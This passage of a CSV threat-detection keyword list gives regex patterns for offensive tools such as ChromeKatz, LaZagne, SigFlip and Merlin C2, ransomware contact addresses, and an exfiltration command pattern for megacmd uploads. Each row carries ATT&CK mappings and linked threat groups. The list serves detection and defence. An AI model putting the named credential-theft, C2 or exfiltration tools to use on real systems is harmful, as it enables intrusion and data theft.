TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","51711" "*Meckazin/ChromeKatz*",".{0,1000}Meckazin\/ChromeKatz.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","51712" "*med0x2e/GadgetToJScript*",".{0,1000}med0x2e\/GadgetToJScript.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","51713" "*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","51714" "*med0x2e/SigFlip*",".{0,1000}med0x2e\/SigFlip.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","51715" "*media_variable_file_cryptography.py*",".{0,1000}media_variable_file_cryptography\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","51716" "*medusa.support@onionmail.org*",".{0,1000}medusa\.support\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51718" "*medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion*",".{0,1000}medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51719" "*medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd.onion*",".{0,1000}medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51720" "*Meedx765taMaedx765sk*",".{0,1000}Meedx765taMaedx765sk.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51721" "*megacmd -conf * put 
*mega:*",".{0,1000}megacmd\s\-conf\s.{0,1000}\sput\s.{0,1000}mega\:.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51723" "*megadose/holehe*",".{0,1000}megadose\/holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","51725" "*megadose@protonmail.com*",".{0,1000}megadose\@protonmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#email","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","51726" "*MegaManSec/SSH-Snake*",".{0,1000}MegaManSec\/SSH\-Snake.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","51727" "*MegaMedusa\x20Attacking*",".{0,1000}MegaMedusa\\x20Attacking.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","51728" "*meliht/Mr.SIP*",".{0,1000}meliht\/Mr\.SIP.{0,1000}","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. 
Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","N/A","4","399","94","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z","51747" "*melted@xmpp.jp*",".{0,1000}melted\@xmpp\.jp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#email","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","51748" "*Meltedd/HVNC*",".{0,1000}Meltedd\/HVNC.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","51749" "*Memcrashed-DDoS-Exploit*",".{0,1000}Memcrashed\-DDoS\-Exploit.{0,1000}","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0001","N/A","N/A","Exploitation tool","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","10","1358","468","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z","51751" "*memfd implant *.elf*",".{0,1000}memfd\simplant\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51752" 
"*memfd task *.elf*",".{0,1000}memfd\stask\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51753" "*memory*mimipy.py*",".{0,1000}memory.{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","51754" "*memory/onepassword.py*",".{0,1000}memory\/onepassword\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","51755" "*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51756" "*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","51757" "*memreader *access_token*",".{0,1000}memreader\s.{0,1000}access_token.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","51758" "*MemReader_BoF.*",".{0,1000}MemReader_BoF\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker 
- Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","51759" "*Meowmycks/etwunhook*",".{0,1000}Meowmycks\/etwunhook.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","51760" "*Meowmycks/LetMeowIn*",".{0,1000}Meowmycks\/LetMeowIn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51761" "*MERGING SHELLCODE WOOOO!!!*",".{0,1000}MERGING\sSHELLCODE\sWOOOO!!!.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","51762" "*merlin-*.zip*",".{0,1000}merlin\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","51763" "*Merlin_ServiceDesc is the grpc.ServiceDesc for Merlin 
service*",".{0,1000}Merlin_ServiceDesc\sis\sthe\sgrpc\.ServiceDesc\sfor\sMerlin\sservice.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51764" "*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51765" "*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51766" "*merlinAgent-*.7z*",".{0,1000}merlinAgent\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51767" "*merlinAgent-*.exe*",".{0,1000}merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a 
Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51768" "*merlinAgent.exe*",".{0,1000}merlinAgent\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51769" "*merlinAgent-Darwin-*",".{0,1000}merlinAgent\-Darwin\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51770" "*merlinAgent-Darwin-x64-*",".{0,1000}merlinAgent\-Darwin\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51771" "*merlinAgent-Darwin-x64.*",".{0,1000}merlinAgent\-Darwin\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51772" "*merlin-agent-dll.7z*",".{0,1000}merlin\-agent\-dll\.7z.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51773" "*merlin-agent-dll/tarball/v*",".{0,1000}merlin\-agent\-dll\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51774" "*merlin-agent-dll/zipball/v*",".{0,1000}merlin\-agent\-dll\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51775" "*merlin-agent-dll\merlin.*",".{0,1000}merlin\-agent\-dll\\merlin\..{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51776" "*merlinAgent-Linux-*",".{0,1000}merlinAgent\-Linux\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51777" "*merlinAgent-Linux-x64-*",".{0,1000}merlinAgent\-Linux\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51778" "*merlinAgent-Linux-x64.*",".{0,1000}merlinAgent\-Linux\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51779" 